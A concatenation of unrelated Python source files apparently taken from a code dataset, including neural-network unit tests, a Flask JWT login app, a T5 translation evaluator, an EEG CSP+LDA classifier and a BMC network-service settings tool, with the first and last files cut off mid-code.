max_epochs=100,
eval_size=0.1, # BBB
verbose=0,
)
nn = NeuralNet(**params)
nn2 = clone(nn)
params1 = nn.get_params()
params2 = nn2.get_params()
for ignore in (
'batch_iterator_train',
'batch_iterator_test',
'output_nonlinearity',
'loss',
'objective',
'train_split',
'eval_size',
'X_tensor_type',
'on_epoch_finished',
'on_batch_finished',
'on_training_started',
'on_training_finished',
'custom_score',
):
for par in (params, params1, params2):
par.pop(ignore, None)
assert params == params1 == params2
def test_lasagne_functional_regression(boston):
from nolearn.lasagne import NeuralNet
X, y = boston
layer1 = InputLayer(shape=(128, 13))
layer2 = DenseLayer(layer1, num_units=100)
output = DenseLayer(layer2, num_units=1, nonlinearity=identity)
nn = NeuralNet(
layers=output,
update_learning_rate=0.01,
update_momentum=0.1,
regression=True,
max_epochs=50,
)
nn.fit(X[:300], y[:300])
assert mean_absolute_error(nn.predict(X[300:]), y[300:]) < 3.0
class TestDefaultObjective:
@pytest.fixture
def get_output(self, monkeypatch):
from nolearn.lasagne import base
get_output_mock = Mock()
monkeypatch.setattr(base, 'get_output', get_output_mock)
return get_output_mock
@pytest.fixture
def objective(self):
from nolearn.lasagne.base import objective
return objective
def test_with_defaults(self, objective, get_output):
loss_function, target = Mock(), Mock()
loss_function.return_value = np.array([1, 2, 3])
result = objective(
[1, 2, 3], loss_function=loss_function, target=target)
assert result == 2.0
get_output.assert_called_with(3, deterministic=False)
loss_function.assert_called_with(get_output.return_value, target)
def test_with_get_output_kw(self, objective, get_output):
loss_function, target = Mock(), Mock()
loss_function.return_value = np.array([1, 2, 3])
objective(
[1, 2, 3], loss_function=loss_function, target=target,
get_output_kw={'i_was': 'here'},
)
get_output.assert_called_with(3, deterministic=False, i_was='here')
class TestTrainSplit:
@pytest.fixture
def TrainSplit(self):
from nolearn.lasagne import TrainSplit
return TrainSplit
def test_reproducable(self, TrainSplit, nn):
X, y = np.random.random((100, 10)), np.repeat([0, 1, 2, 3], 25)
X_train1, X_valid1, y_train1, y_valid1 = TrainSplit(0.2)(
X, y, nn)
X_train2, X_valid2, y_train2, y_valid2 = TrainSplit(0.2)(
X, y, nn)
assert np.all(X_train1 == X_train2)
assert np.all(y_valid1 == y_valid2)
def test_eval_size_zero(self, TrainSplit, nn):
X, y = np.random.random((100, 10)), np.repeat([0, 1, 2, 3], 25)
X_train, X_valid, y_train, y_valid = TrainSplit(0.0)(
X, y, nn)
assert len(X_train) == len(X)
assert len(y_train) == len(y)
assert len(X_valid) == 0
assert len(y_valid) == 0
def test_eval_size_half(self, TrainSplit, nn):
X, y = np.random.random((100, 10)), np.repeat([0, 1, 2, 3], 25)
X_train, X_valid, y_train, y_valid = TrainSplit(0.51)(
X, y, nn)
assert len(X_train) + len(X_valid) == 100
assert len(y_train) + len(y_valid) == 100
assert len(X_train) > 45
def test_regression(self, TrainSplit, nn):
X = np.random.random((100, 10))
y = np.random.random((100))
nn.regression = True
X_train, X_valid, y_train, y_valid = TrainSplit(0.2)(
X, y, nn)
assert len(X_train) == len(y_train) == 80
assert len(X_valid) == len(y_valid) == 20
def test_stratified(self, TrainSplit, nn):
X = np.random.random((100, 10))
y = np.hstack([np.repeat([0, 0, 0], 25), np.repeat([1], 25)])
X_train, X_valid, y_train, y_valid = TrainSplit(0.2)(
X, y, nn)
assert y_train.sum() == 0.8 * 25
assert y_valid.sum() == 0.2 * 25
def test_not_stratified(self, TrainSplit, nn):
X = np.random.random((100, 10))
y = np.hstack([np.repeat([0, 0, 0], 25), np.repeat([1], 25)])
X_train, X_valid, y_train, y_valid = TrainSplit(0.2, stratify=False)(
X, y, nn)
assert y_train.sum() == 25
assert y_valid.sum() == 0
def test_X_is_dict(self, TrainSplit, nn):
X = {
'1': np.random.random((100, 10)),
'2': np.random.random((100, 10)),
}
y = np.repeat([0, 1, 2, 3], 25)
X_train, X_valid, y_train, y_valid = TrainSplit(0.2)(
X, y, nn)
assert len(X_train['1']) == len(X_train['2']) == len(y_train) == 80
assert len(X_valid['1']) == len(X_valid['2']) == len(y_valid) == 20
def test_X_is_dict_eval_size_0(self, TrainSplit, nn):
X = {
'1': np.random.random((100, 10)),
'2': np.random.random((100, 10)),
}
y = np.repeat([0, 1, 2, 3], 25)
X_train, X_valid, y_train, y_valid = TrainSplit(0)(
X, y, nn)
assert len(X_train['1']) == len(X_train['2']) == len(y_train) == 100
assert len(X_valid['1']) == len(X_valid['2']) == len(y_valid) == 0
class TestTrainTestSplitBackwardCompatibility:
@pytest.fixture
def LegacyNet(self, NeuralNet):
class LegacyNet(NeuralNet):
def train_test_split(self, X, y, eval_size):
self.__call_args__ = (X, y, eval_size)
split = int(X.shape[0] * eval_size)
return X[:split], X[split:], y[:split], y[split:]
return LegacyNet
def test_legacy_eval_size(self, NeuralNet):
net = NeuralNet([], eval_size=0.3, max_epochs=0)
assert net.train_split.eval_size == 0.3
def test_legacy_method_default_eval_size(self, LegacyNet):
net = LegacyNet([], max_epochs=0)
X, y = np.ones((10, 3)), np.zeros(10)
net.train_loop(X, y)
assert net.__call_args__ == (X, y, 0.2)
def test_legacy_method_given_eval_size(self, LegacyNet):
net = LegacyNet([], eval_size=0.3, max_epochs=0)
X, y = np.ones((10, 3)), np.zeros(10)
net.train_loop(X, y)
assert net.__call_args__ == (X, y, 0.3)
class TestCheckForUnusedKwargs:
def test_okay(self, NeuralNet):
net = NeuralNet(
layers=[('input', Mock), ('mylayer', Mock)],
input_shape=(10, 10),
mylayer_hey='hey',
update_foo=1,
update_bar=2,
)
net._create_iter_funcs = lambda *args: (1, 2, 3)
net.initialize()
def test_unused(self, NeuralNet):
net = NeuralNet(
layers=[('input', Mock), ('mylayer', Mock)],
input_shape=(10, 10),
mylayer_hey='hey',
yourlayer_ho='ho',
update_foo=1,
update_bar=2,
)
net._create_iter_funcs = lambda *args: (1, 2, 3)
with pytest.raises(ValueError) as err:
net.initialize()
assert str(err.value) == 'Unused kwarg: yourlayer_ho'
class TestInitializeLayers:
def test_initialization_with_layer_instance(self, NeuralNet):
layer1 = InputLayer(shape=(128, 13)) # name will be assigned
layer2 = DenseLayer(layer1, name='output', num_units=2) # has name
nn = NeuralNet(layers=layer2)
out = nn.initialize_layers()
assert nn.layers_['output'] == layer2 == out
assert nn.layers_['input0'] == layer1
def test_initialization_with_layer_instance_bad_params(self, NeuralNet):
layer = DenseLayer(InputLayer(shape=(128, 13)), num_units=2)
nn = NeuralNet(layers=layer, dense1_num_units=3)
with pytest.raises(ValueError):
nn.initialize_layers()
def test_initialization_with_tuples(self, NeuralNet):
input = Mock(__name__='InputLayer', __bases__=(InputLayer,))
hidden1, hidden2, output = [
Mock(__name__='MockLayer', __bases__=(Layer,)) for i in range(3)]
nn = NeuralNet(
layers=[
(input, {'shape': (10, 10), 'name': 'input'}),
(hidden1, {'some': 'param', 'another': 'param'}),
(hidden2, {}),
(output, {'name': 'output'}),
],
input_shape=(10, 10),
mock1_some='iwin',
)
out = nn.initialize_layers(nn.layers)
input.assert_called_with(
name='input', shape=(10, 10))
assert nn.layers_['input'] is input.return_value
hidden1.assert_called_with(
incoming=input.return_value, name='mock1',
some='iwin', another='param')
assert nn.layers_['mock1'] is hidden1.return_value
hidden2.assert_called_with(
incoming=hidden1.return_value, name='mock2')
assert nn.layers_['mock2'] is hidden2.return_value
output.assert_called_with(
incoming=hidden2.return_value, name='output')
assert out is nn.layers_['output']
def test_initialization_legacy(self, NeuralNet):
input = Mock(__name__='InputLayer', __bases__=(InputLayer,))
hidden1, hidden2, output = [
Mock(__name__='MockLayer', __bases__=(Layer,)) for i in range(3)]
nn = NeuralNet(
layers=[
('input', input),
('hidden1', hidden1),
('hidden2', hidden2),
('output', output),
],
input_shape=(10, 10),
hidden1_some='param',
)
out = nn.initialize_layers(nn.layers)
input.assert_called_with(
name='input', shape=(10, 10))
assert nn.layers_['input'] is input.return_value
hidden1.assert_called_with(
incoming=input.return_value, name='hidden1', some='param')
assert nn.layers_['hidden1'] is hidden1.return_value
hidden2.assert_called_with(
incoming=hidden1.return_value, name='hidden2')
assert nn.layers_['hidden2'] is hidden2.return_value
output.assert_called_with(
incoming=hidden2.return_value, name='output')
assert out is nn.layers_['output']
def test_initialization_legacy_with_unicode_names(self, NeuralNet):
# Test whether legacy initialization is triggered; if not,
# raises error.
input = Mock(__name__='InputLayer', __bases__=(InputLayer,))
hidden1, hidden2, output = [
Mock(__name__='MockLayer', __bases__=(Layer,)) for i in range(3)]
nn = NeuralNet(
layers=[
(u'input', input),
(u'hidden1', hidden1),
(u'hidden2', hidden2),
(u'output', output),
],
input_shape=(10, 10),
hidden1_some='param',
)
nn.initialize_layers()
def test_diamond(self, NeuralNet):
input = Mock(__name__='InputLayer', __bases__=(InputLayer,))
hidden1, hidden2, concat, output = [
Mock(__name__='MockLayer', __bases__=(Layer,)) for i in range(4)]
nn = NeuralNet(
layers=[
('input', input),
('hidden1', hidden1),
('hidden2', hidden2),
('concat', concat),
('output', output),
],
input_shape=(10, 10),
hidden2_incoming='input',
concat_incomings=['hidden1', 'hidden2'],
)
nn.initialize_layers(nn.layers)
input.assert_called_with(name='input', shape=(10, 10))
hidden1.assert_called_with(incoming=input.return_value, name='hidden1')
hidden2.assert_called_with(incoming=input.return_value, name='hidden2')
concat.assert_called_with(
incomings=[hidden1.return_value, hidden2.return_value],
name='concat'
)
output.assert_called_with(incoming=concat.return_value, name='output')
class TestCheckGoodInput:
@pytest.fixture
def check_good_input(self, nn):
return nn._check_good_input
@pytest.fixture
def X(self):
return np.arange(100).reshape(10, 10).astype(floatX)
@pytest.fixture
def y(self):
return np.arange(10).astype(np.int32)
@pytest.fixture
def y_regr(self):
return np.arange(10).reshape(-1, 1).astype(floatX)
def test_X_OK(self, check_good_input, X):
assert check_good_input(X) == (X, None)
def test_X_and_y_OK(self, check_good_input, X, y):
assert check_good_input(X, y) == (X, y)
def test_X_and_y_OK_regression(self, nn, check_good_input, X, y_regr):
nn.regression = True
assert check_good_input(X, y_regr) == (X, y_regr)
def test_X_and_y_length_mismatch(self, check_good_input, X, y):
with pytest.raises(ValueError):
check_good_input(
X[:9],
y
)
def test_X_dict_and_y_length_mismatch(self, check_good_input, X, y):
with pytest.raises(ValueError):
check_good_input(
{'one': X, 'two': X},
y[:9],
)
def test_X_dict_length_mismatch(self, check_good_input, X):
with pytest.raises(ValueError):
check_good_input({
'one': X,
'two': X[:9],
})
def test_y_regression_1dim(self, nn, check_good_input, X, y_regr):
y = y_regr.reshape(-1)
nn.regression = True
X1, y1 = check_good_input(X, y)
assert (X1 == X).all()
assert (y1 == y.reshape(-1, 1)).all()
def test_y_regression_2dim(self, nn, check_good_input, X, y_regr):
y = y_regr
nn.regression = True
X1, y1 = check_good_input(X, y)
assert (X1 == X).all()
assert (y1 == y).all()
class TestMultiInputFunctional:
@pytest.fixture(scope='session')
def net(self, NeuralNet):
return NeuralNet(
layers=[
(InputLayer,
{'name': 'input1', 'shape': (None, 392)}),
(DenseLayer,
{'name': 'hidden1', 'num_units': 98}),
(InputLayer,
{'name': 'input2', 'shape': (None, 392)}),
(DenseLayer,
{'name': 'hidden2', 'num_units': 98}),
(ConcatLayer,
{'incomings': ['hidden1', 'hidden2']}),
(DenseLayer,
{'name': 'hidden3', 'num_units': 98}),
(DenseLayer,
{'name': 'output', 'num_units': 10, 'nonlinearity': softmax}),
],
update=nesterov_momentum,
update_learning_rate=0.01,
update_momentum=0.9,
max_epochs=2,
verbose=4,
)
@pytest.fixture(scope='session')
def net_fitted(self, net, mnist):
X, y = mnist
X_train, y_train = X[:10000], y[:10000]
X_train1, X_train2 = X_train[:, :392], X_train[:, 392:]
return net.fit({'input1': X_train1, 'input2': X_train2}, y_train)
@pytest.fixture(scope='session')
def y_pred(self, net_fitted, mnist):
X, y = mnist
X_test = X[60000:]
X_test1, X_test2 = X_test[:, :392], X_test[:, 392:]
return net_fitted.predict({'input1': X_test1, 'input2': X_test2})
def test_accuracy(self, net_fitted, mnist, y_pred):
X, y = mnist
y_test = y[60000:]
assert accuracy_score(y_pred, y_test) > 0.85
| StarcoderdataPython |
9744816 | from enum import Enum
from dataclasses import dataclass
class TokenType(Enum):
NUM = 0
VAR = 1
PLUS = 2
MINUS = 3
MULTIPLY = 4
DIVIDE = 5
POWER = 6
LEFT_PARENTHESES = 7
RIGHT_PARENTHESES = 8
@dataclass
class Token:
type: TokenType
value: any = None
def __repr__(self):
return self.type.name + (f": {self.value}" if self.value != None else "")
| StarcoderdataPython |
4846625 | <filename>3d/linear_waves_flat_3D/linear_waves_flat_3D_01_GAZ/tank_batch.py
simFlagsList[0]['storeQuantities']= ["q:'phi_solid'","q:'velocity_solid'"]
#simFlagsList[0]['storeQuantities']= ["q:velocity_solid"]
start
quit
| StarcoderdataPython |
3409508 | <reponame>Nitinsd96/Air-Pollution-Monitoring-System<gh_stars>0
#####
#
# This class is part of the Programming the Internet of Things
# project, and is available via the MIT License, which can be
# found in the LICENSE file at the top level of this repository.
#
# Copyright (c) 2020 by <NAME>
#
import logging
import unittest
from programmingtheiot.cda.system.SystemCpuUtilTask import SystemCpuUtilTask
class SystemCpuUtilTaskTest(unittest.TestCase):
"""
This test case class contains very basic unit tests for
SystemCpuUtilTask. It should not be considered complete,
but serve as a starting point for the student implementing
additional functionality within their Programming the IoT
environment.
"""
@classmethod
def setUpClass(self):
logging.basicConfig(format = '%(asctime)s:%(module)s:%(levelname)s:%(message)s', level = logging.DEBUG)
logging.info("Testing SystemCpuUtilTask class...")
self.cpuUtilTask = SystemCpuUtilTask()
def setUp(self):
pass
def tearDown(self):
pass
@unittest.skip("Ignore for now.")
def testGenerateTelemetry(self):
sd = self.cpuUtilTask.generateTelemetry()
self.assertIsNotNone(sd)
self.assertGreaterEqual(sd.getValue(), 0.0)
logging.info("CPU utilization SensorData: %s", str(sd))
def testGetTelemetryValue(self):
val = self.cpuUtilTask.getTelemetryValue()
self.assertGreaterEqual(val, 0.0)
logging.info("CPU utilization: %s", str(val))
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
4895688 | <reponame>casutton/bayes-qnet
#!/usr/bin/python
from scipy.optimize import *
from scipy.integrate import *
import distributions
import misc
import mytime
import numpy
ln = distributions.LogNormal (0, 1)
N = 100
tmr = mytime.timeit()
allint = []
for i in xrange(N):
allint.append (misc.mcint (ln.lpdf, 0, 3))
elapsed = tmr.total("Time for %d integrations" % N)
print "Integrations per second = %.4f" % (N / elapsed)
print "Integrals: mean %.4f sd %.4f" % (numpy.mean(allint), numpy.std(allint))
print "From quad:", quad(ln.lpdf, 0, 3)
ln2 = distributions.LogNormal (-3.75, 1)
N = 10000
tmr = mytime.timeit()
for i in xrange(N):
integral = quad (ln2.lpdf, 0, 3)
print "integral was %.10f" % integral[0]
elapsed = tmr.total("Time for %d integrations" % N)
print "Integrations per second = %.4f" % (N / elapsed)
| StarcoderdataPython |
3418605 | from textwrap import dedent
from flake8_plugin_utils import assert_error, assert_not_error
from {{cookiecutter.project_slug}}.errors import {{cookiecutter.error_name}}Error
from {{cookiecutter.project_slug}}.visitor import {{cookiecutter.plugin_name}}Visitor
def test_error():
code = dedent(
"""
"""
)
assert_error(
{{cookiecutter.plugin_name}}Visitor, code, {{cookiecutter.error_name}}Error
)
def test_no_error():
code = dedent(
"""
"""
)
assert_not_error({{cookiecutter.plugin_name}}Visitor, code)
| StarcoderdataPython |
62722 | <gh_stars>100-1000
import numpy as np
import pytest
import elfi
def test_sample():
n_samples = 10
parameter_names = ['a', 'b']
distance_name = 'dist'
samples = [
np.random.random(n_samples),
np.random.random(n_samples),
np.random.random(n_samples)
]
outputs = dict(zip(parameter_names + [distance_name], samples))
sample = elfi.methods.results.Sample(
method_name="TestRes",
outputs=outputs,
parameter_names=parameter_names,
discrepancy_name=distance_name,
something='x',
something_else='y',
n_sim=0, )
assert sample.method_name == "TestRes"
assert hasattr(sample, 'samples')
assert sample.n_samples == n_samples
assert sample.dim == len(parameter_names)
assert not sample.is_multivariate
assert np.allclose(samples[0], sample.samples_array[:, 0])
assert np.allclose(samples[1], sample.samples_array[:, 1])
assert np.allclose(samples[-1], sample.discrepancies)
assert hasattr(sample, 'something')
assert sample.something_else == 'y'
with pytest.raises(AttributeError):
sample.not_here
# Test summary
sample.summary()
def test_bolfi_sample():
n_chains = 3
n_iters = 10
warmup = 5
parameter_names = ['a', 'b']
chains = np.random.random((n_chains, n_iters, len(parameter_names)))
result = elfi.methods.results.BolfiSample(
method_name="TestRes",
chains=chains,
parameter_names=parameter_names,
warmup=warmup,
something='x',
something_else='y',
n_sim=0, )
assert result.method_name == "TestRes"
assert hasattr(result, 'samples')
assert hasattr(result, 'chains')
assert hasattr(result, 'outputs')
assert result.n_samples == n_chains * (n_iters - warmup)
assert result.dim == len(parameter_names)
assert not result.is_multivariate
# verify that chains are merged correctly
s0 = np.concatenate([chains[i, warmup:, 0] for i in range(n_chains)])
s1 = np.concatenate([chains[i, warmup:, 1] for i in range(n_chains)])
assert np.allclose(s0, result.samples[parameter_names[0]])
assert np.allclose(s1, result.samples[parameter_names[1]])
assert hasattr(result, 'something')
assert result.something_else == 'y'
@pytest.mark.parametrize('multivariate_model', [3], indirect=True)
def test_multivariate(multivariate_model):
n_samples = 10
rej = elfi.Rejection(multivariate_model['d'], batch_size=5)
sample = rej.sample(n_samples)
assert sample.outputs['t1'].shape == (n_samples, 3)
assert sample.outputs['d'].shape == (n_samples,)
assert sample.is_multivariate
| StarcoderdataPython |
8197897 | <gh_stars>0
"""Faça um Programa que peça um número correspondente a um determinado ano e em seguida informe se este
ano é ou não bissexto"""
ano = int(input('Digite um ano parasaber se é bissexto: '))
if ano % 4 == 0 and ano % 100 != 0 or ano % 400 == 0:
print('O ano é Bissexto!')
else:
print('O ano Não é Bissexto!')
| StarcoderdataPython |
6686 | <reponame>natedogg484/react-flask-authentication
from flask import Flask
from flask_cors import CORS
from flask_restful import Api
from flask_sqlalchemy import SQLAlchemy
from flask_jwt_extended import JWTManager
app = Flask(__name__)
CORS(app)
api = Api(app)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///app.db'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SECRET_KEY'] = 'some-secret-string'
app.config['JWT_SECRET_KEY'] = 'jwt-secret-string'
app.config['JWT_BLACKLIST_ENABLED'] = True
app.config['JWT_BLACKLIST_TOKEN_CHECKS'] = ['access', 'refresh']
db = SQLAlchemy(app)
jwt = JWTManager(app)
@app.before_first_request
def create_tables():
db.create_all()
import models, resources, views
api.add_resource(resources.UserRegistration, '/registration')
api.add_resource(resources.UserLogin, '/login')
api.add_resource(resources.UserLogoutAccess, '/logout/access')
api.add_resource(resources.UserLogoutRefresh, '/logout/refresh')
api.add_resource(resources.TokenRefresh, '/token/refresh')
api.add_resource(resources.AllUsers, '/users')
api.add_resource(resources.SecretResource, '/secret')
@jwt.token_in_blacklist_loader
def check_if_token_in_blacklist(decrypted_token):
jti = decrypted_token['jti']
return models.RevokedTokenModel.is_jti_blacklisted(jti) | StarcoderdataPython |
1666190 | <gh_stars>1-10
import pytest
from AcadeMeData.models import University, Degree, Professor, User, Course, MessageBoards
@pytest.fixture
def generate_university(university_id=5, name='The Technion', location="Haifa",
description="Best University in Israel"):
university = University(university_id=university_id, name=name, location=location,
description=description)
university.save()
return university
@pytest.fixture
def generate_degree(degree_id=1, name='History', universities="Ben Gurion University, Reichman University",
description="Learn about historic events and their influences on the world"):
degree = Degree.create_degree(degree_id=degree_id, name=name, universities=universities,
description=description)
degree.save()
return degree
@pytest.fixture
def generate_professor(generate_university, professor_id=2, name="DR <NAME>",
description="A cool guy who looked familiar", rate=4.5):
professor = Professor.create_professor(professor_id=professor_id,
name=name,
university=generate_university,
description=description,
rate=rate)
return professor
@pytest.fixture
def user_example():
user_data = {'username': "username2212", 'password': "password", 'email': "<EMAIL>",
'university': "RU",
'degree': "CS"}
user = User.create_user(*user_data)
return user
@pytest.fixture
def generate_course(generate_degree, generate_professor, course_id=1, name="History of Countries",
mandatory=True, description="Learn about historic events and their influences on countries"):
course = Course.create_course(course_id=course_id, name=name, degree=generate_degree, mandatory=mandatory,
description=description, professor=generate_professor)
course.save()
return course
@pytest.fixture
def generate_msgboard(generate_course, id=1):
msgboard = MessageBoards(id=id, courseName=generate_course)
msgboard.save()
return msgboard
| StarcoderdataPython |
6681279 | from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.pipeline import Pipeline
from mne.decoding import CSP
from BIpy.data_processing import get_windows, LowpassWrapper
import numpy as np
class DummyClassifier():
"""Dummy classifier for testing purpose"""
def __init__(self):
self.window_size = 1
def predict_proba(self, data):
"""returns input[0]"""
print('predict_proba:', data)
return data[-1]
# window size in samples, not seconds
def get_trained_CSP_LDA(data, labels, window_size=None, preprocessing=LowpassWrapper(), step_size=None):
"""Returns a trained sklearn pipeline of [csp, lda]
Parameters
----------
data : np.array
Data to train the classifier on
Shape (trials, channels, time)
labels : np.array
1d array of labels to the training data
window_size : int
Size in samples (not seconds) the classifier should be trained on
If None, the function will trian with each entire trial as input
Default None
preprocessing : object implementing fit_transform and transform
Preprocessing step to add at the beggining of the sklearn pipeline
Default BIpy.preprocessing.LowpassWraspper()
step_size : int, default None
Stride/step size passed to BIpy.data_processing.get_windows()
If None, classifier will be trained on raw data and get_windows() is never used
Returns
-------
clf
A trained csp + lda Pipeline
"""
# slide window over trial data to generate many more data points
if step_size and window_size and window_size < data.shape[-1]:
data, labels = get_windows(data, labels, window_size, step_size)
# make pipeline
preproc = preprocessing
lda = LinearDiscriminantAnalysis()
csp = CSP(n_components=10, reg=None, log=None, norm_trace=False, component_order='alternate')
clf = Pipeline([(str(preproc), preproc), ('CSP', csp), ('LDA', lda)])
# train model
clf.fit(data, labels)
# return trained model
return clf
# [NOTE]: extend this so it generalizes to gell eeg
class WrappedCSPLDAClassifier():
"""Wrapper class for using an sklearn csp+lda pipeline in a BIpy.bci.ClassifierProcess
Methods
-------
predict_proba(self, window: np.array)
takes the output form a WindowInlet and returns the probability (according to the csp+lda classifier) that the right hand was imagined
def fit(self, data, labels):
calls fit(data, labels) on the csp+lda classifier
"""
def __init__(self, data_channels=list(range(20)), window_size=1000, preprocessing=LowpassWrapper()):
"""
Parameters
----------
data_channels : int, default list(range(20))
Channels that the classifier should use as input
window_size : int, default 1000
number of samples of eeg data the classifier should use as input
preprocessing : default LowpassWrapper()
Step added to the start of the csp+lda sklearn pipeline
"""
self.window_size=window_size
self.data_channels = data_channels
# make pipeline
preproc = preprocessing
lda = LinearDiscriminantAnalysis()
csp = CSP(n_components=10, reg=None, log=None, norm_trace=False, component_order='alternate')
self.clf = Pipeline([(str(preproc), preproc), ('CSP', csp), ('LDA', lda)])
def predict_proba(self, window: np.array):
"""takes the output form a WindowInlet and returns the probability (according to the csp+lda classifier) that the right hand was imagined"""
data = np.transpose(np.array(window))[self.data_channels]
print('data shape in wrapped:', data.shape)
proba = self.clf.predict_proba(data)
return proba[0][1] # proba = [[prob_left, prob_right]]
def fit(self, data, labels):
"""calls fit(data, labels) on the csp+lda classifier"""
self.clf.fit(data, labels)
| StarcoderdataPython |
135879 | from .profile import profile_getaddrinfo, profile_getaddrinfo_async | StarcoderdataPython |
72907 | import logging
import os
import torch
from dataset import MonoDataset
from torch.utils.data import DataLoader
from tqdm import tqdm
from transformers import T5ForConditionalGeneration
from transformers import T5Tokenizer
from utils import calculate_bleu_score
from utils import load_config
from finetune_t5 import EXPERIMENT_CONFIG_NAME
logging.root.setLevel(logging.NOTSET)
class Evaluator:
"""
This is an evaluator class for evaluating a t5 huggingface model on a parallel test set
Attributes:
model_config: model configuration
train_config: training configuration
data_config: data paths configuration
experiment_path: path where experiment output will be dumped
tokenizer: tokenizer
src_test_generator: data generator for source test sentences
tgt_test: list of target test sentences
device: device where experiment will happen (gpu or cpu)
"""
def __init__(
self,
experiment_path: str,
src_test_path: str,
tgt_test_path: str,
save_as_pretrained: bool = False,
):
self._check_inputs(experiment_path)
config = load_config(os.path.join(experiment_path, EXPERIMENT_CONFIG_NAME))
self.model_config = config["model"]
self.train_config = config["training"]
self.data_config = config["data"]
self.experiment_path = experiment_path
if self.model_config["tokenizer_path"]:
self.tokenizer = T5Tokenizer.from_pretrained(self.model_config["tokenizer_path"])
else:
logging.warning(
f"No tokenizer path inputed, using {self.model_config['model_size']} default pretrained tokenizer"
)
self.tokenizer = T5Tokenizer.from_pretrained(self.model_config["model_size"])
self.device = torch.device(
"cuda" if self.train_config["use_cuda"] and torch.cuda.is_available() else "cpu"
)
self._load_model(experiment_path, save_as_pretrained)
self.src_test_generator, self.tgt_test = self._create_datasets(src_test_path, tgt_test_path)
def _load_model(self, experiment_path: str, save_as_pretrained: bool) -> None:
"""
Loads trained model weights and saves as a huggingface pretrained model if specified.
"""
logging.info("Loading model...")
model_config = {
"early_stopping": self.train_config["early_stopping"],
"max_length": self.train_config["max_output_length"],
"num_beams": self.train_config["beam_size"],
"prefix": self.data_config["src_prefix"],
"vocab_size": self.tokenizer.vocab_size,
}
self.model = T5ForConditionalGeneration.from_pretrained(self.model_config["model_size"])
self.model.config.update(model_config)
checkpoint = torch.load(os.path.join(experiment_path, "best_model.pt"))
self.model.load_state_dict(checkpoint["model_state"])
self.model.to(self.device)
if save_as_pretrained:
pretrained_path = os.path.join(experiment_path, "best_model.bin")
self.model.save_pretrained(pretrained_path)
logging.info(
f"Loaded model saved as pretrained model in path: {pretrained_path} ! Can now be loaded with: 'model.from_pretrained(path)' "
)
def _create_datasets(self, src_test_path: str, tgt_test_path: str) -> tuple:
"""
Creates source test data generator and target reference data.
"""
src_test = [
self.model.config.prefix + text.strip() + " </s>" for text in list(open(src_test_path))
]
tgt_test = [text.strip() for text in list(open(tgt_test_path))]
assert len(src_test) == len(
tgt_test
), "Source and Target data must have the same number of sentences"
logging.info(f"Evaluating on datasets of {len(src_test)} sentences each...")
src_test_dict = self.tokenizer.batch_encode_plus(
src_test,
max_length=self.train_config["max_output_length"],
return_tensors="pt",
pad_to_max_length=True,
)
params = {
"batch_size": self.train_config["batch_size"],
"shuffle": False,
"num_workers": self.train_config["num_workers_data_gen"],
}
input_test_ids = src_test_dict["input_ids"]
src_test_generator = DataLoader(MonoDataset(input_test_ids), **params)
all_data = (src_test_generator, tgt_test)
return all_data
def evaluate(self) -> None:
"""
Evaluate test data according to bleu score.
"""
logging.info(f"Evaluating model with this configuration: \n {self.model.config}")
# generate predictions and calculate bleu score
hyps = []
self.model.eval()
with torch.no_grad():
for batch in tqdm(self.src_test_generator):
batch = batch.to(self.device)
translations = self.model.generate(input_ids=batch)
decoded = [
self.tokenizer.decode(
translation, skip_special_tokens=True, clean_up_tokenization_spaces=False
)
for translation in translations
]
hyps = hyps + decoded
bleu_score = calculate_bleu_score(hyps, self.tgt_test)
logging.info(f"BLEU score on test data is: {bleu_score:.2f}")
# write hypothesis to file
hyps_path = os.path.join(self.experiment_path, f"model_test_hyps_bleu:{bleu_score:.2f}.txt")
with open(hyps_path, "w") as file:
for sent in hyps:
file.write(sent + " \n")
logging.info(f"Model hypothesis saved in {hyps_path}")
def _check_inputs(self, experiment_path: str) -> None:
"""
check that input experiment path contains files needed for evaluation.
"""
# check there is a single model named best_mode.pt in path
assert (
len(list(filter(lambda x: x == "best_model.pt", os.listdir(experiment_path)))) == 1
), "A single model file must exist and be named as 'best_model.pt' "
# check config file is in path
assert os.path.isfile(
os.path.join(experiment_path, EXPERIMENT_CONFIG_NAME)
), f"Configuration file must exist in experiment path as {EXPERIMENT_CONFIG_NAME}"
| StarcoderdataPython |
11321688 | <gh_stars>1-10
###
# Copyright 2021 New H3C Technologies Co., Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
# -*- coding: utf-8 -*-
from exception.ToolException import FailException
from utils.client import RestfulClient
from utils.common import Constant
from utils.tools import init_args
from utils.model import BaseModule
class SetService(BaseModule):
def __init__(self):
super().__init__()
self.args_lst = [
"service_type",
"status",
"non_secure_port",
"secure_port",
"timeout"
]
def run(self, args):
init_args(args, self.args_lst)
flag = self.check_args(args)
client = RestfulClient(args)
url = "/api/settings/services"
try:
resp = client.send_request("GET", url)
if resp and isinstance(resp, list):
for service in resp:
if service.get("service_name", None) == args.service_type:
url, payload = (self.construct_request_parameters(
service, url, args))
resp = client.send_request("PUT", url, payload)
if (isinstance(resp, dict) and
((resp.get("code") == Constant.FAILED_1306 or
resp.get("cc") ==
Constant.SUCCESS_0) if flag else resp.get(
"cc") == Constant.SUCCESS_0)):
suc_info = ("Success: set BMC network protocol "
"services successfully")
self.suc_list.append(suc_info)
else:
err_info = "Failure: service setup failed"
self.err_list.append(err_info)
break
else:
err_info = "Failure: the service item was not found"
self.err_list.append(err_info)
else:
err_info = ("Failure: failed to get service configuration "
"information")
self.err_list.append(err_info)
if self.err_list:
raise FailException(*self.err_list)
finally:
if client.cookie:
client.delete_session()
return self.suc_list
def check_args(self, args):
flag = False
if args.service_type == "Web":
flag = True
if args.status is not None:
err_info = ("Argument: invalid choice: %s (may cause serious "
"consequences)" % args.status)
self.err_list.append(err_info)
raise FailException(*self.err_list)
if args.service_type == "IPMI":
flag = True
if args.status is not None:
err_info = ("Argument: invalid choice: %s (may cause serious "
"consequences)" % args.status)
self.err_list.append(err_info)
raise FailException(*self.err_list)
return flag
def construct_request_parameters(self, service, url, args):
payload = service
if args.status is not None:
